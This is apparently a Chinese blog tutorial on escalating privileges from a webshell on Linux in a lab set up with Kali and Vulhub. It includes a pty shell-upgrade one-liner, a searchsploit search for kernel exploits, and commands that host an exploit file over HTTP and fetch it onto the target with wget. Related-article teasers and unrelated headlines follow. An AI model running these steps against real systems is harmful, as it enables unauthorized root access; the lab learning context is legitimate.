webshell 提权
在我们使用cve或者其他方式获取shell 后
python -c 'import pty;pty.spawn("/bin/bash")'
获取一个交互式的bash shell
使用id 命令可以查看当前的用户权限
查看当前的linux 系统版本
利用kali自带的漏洞检索库检索漏洞
searchsploit privilege | grep -i linux | grep -i kernel | grep 5
使用find 或者locate 获取文件路径,locate 初次使用可能没有任何显示,需要使用updatedb更新数据
进行exp 代码下载
启动http服务时,使用的是win11 +kali + ubuntu,ubuntu 启动vulhub ,kali启动http服务,
由于使用wsl2 的配置未使用vmware ,在localhost 可以看到对应的文件
这个是cp 拷贝到home 目录下的但是使用wget http://localhost无法下载
- 50808.c
使用ifconfig kali 查看ip方配置 如果没有ifconfig 使用如下命令:
apt install net-tools
PS(备用:使用打开防火墙端口)可能不需要打开
iptables -A INPUT -p tcp -i docker0 --dport 8160 -j ACCEPT
ubuntu kali的地址ip 地址使用wget 对kernel cve 提权文件漏洞文件.c进行下载
在exp 的路径下使用python启用web 服务
python3 -m http.server 8160
使用wget 进行下载exp
目标机中缺少动态库需要安装gcc 内核提权
参考博客:
c(184条消息) Linux提权第一篇-Linux内核漏洞提权(以CVE-2015-1328为例)_OceanSec的博客-CSDN博客_linux内核提权
webshell 提权相关推荐
- 常用webshell提权方法
pcAnywhere提权: 1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users ...
- 一套webshell提权教程
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...
- webshell提权教程小结
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...
- 虚拟主机封杀WebShell提权!
虚拟主机封杀WebShell提权! (2006-10-17 15:24:45) http://blog.sina.com.cn/s/blog_4560b80b010007py.html 转载▼ 分 ...
- msf 之 webshell 提权
为什么80%的码农都做不了架构师?>>> 首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter ...
- Metasploit 之 webshell 提权
本文所涉及的方法只能在已授权的机器上做测试. 首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强 ...
- 常用webshell提权方法总结
pcAnywhere提权: 1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users ...
- webshell提权宝典
网络安全 说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客- 嘻嘻--好跟我来,看看有什么可以利用的来提升权限 ** ...
- 经典的webshell提权
说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客- 嘻嘻--好跟我来,看看有什么可以利用的来提升权限 ***** ...
最新文章
- 远程过程调用RPC简介
- rpm安装mysql报错NOKEY_rpm包安装报错: Header V3 RSASHA256 Signature, key ID fd431d51 NOKEY
- Linux下mknod的作用,Linux系统mknod命令用法
- WP8.1学习系列(第二十二章)——在页面之间导航
- MySQL中的单引号
- ZOJ -3203 三分+数学
- Android系统(120)-android的事件分发机制
- 【报告分享】2021年BrandGrow中国新锐品牌增长潜力报告.pdf(附下载链接)
- 数据结构与算法顺序表数组版
- VXLAN详解(二)
- Codeforces Manthan, Codefest 18 (rated, Div. 1 + Div. 2) E.Trips
- c语言模拟题第五套,2013年计算机二级C语言考试全真模拟试题第五套
- torch中permute()函数用法
- mysql 升级 乱码_mysql3升级到mysql5解决乱码心得
- win32实现两个透明窗口联动
- 计算机函数乘法word,【2人回答】Word里相乘的函数是什么?-3D溜溜网
- 八、Sentinel.conf 配置文件详细介绍
- MySQL——事务(Transaction)详解
- 自动控制(程序计数器)
- 只有华强北才能拯救诺基亚?